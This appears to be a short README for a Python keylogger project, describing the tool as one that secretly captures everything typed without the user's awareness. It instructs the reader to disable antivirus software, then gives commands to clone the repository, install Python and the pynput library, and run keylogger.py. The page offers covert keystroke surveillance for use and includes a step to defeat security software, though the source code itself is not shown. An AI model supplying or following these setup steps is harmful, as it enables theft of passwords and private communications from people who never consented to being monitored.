Keylogger
Keylogger
What is a Keylogger?
A keylogger, in computer science, is a hardware or software tool capable of recording the keyboard inputs of a computer, meaning it can secretly intercept and capture everything typed on the keyboard without the user's awareness.
Note: Disable any antivirus software before running the keylogger.
Downloading the Files
git clone https://github.com/ArduinoDenis/keylogger.git
How to Install Python?
If you have Windows 10 or 11, download Python from the Microsoft Store (the procedure is automatic).
If you have macOS, download it by clicking on Download Python and follow the installation instructions.
If you have Linux, open a terminal and type the following:
Procedure for Linux (including macOS)
sudo apt-get install python3 -y && sudo apt-get install python3-pip
How to Install the Library?
Open a terminal and copy and paste the following line:
pip3 install pynput
Press Enter and wait for the installation to complete.
Running the Script
python3 keylogger.py
Last updated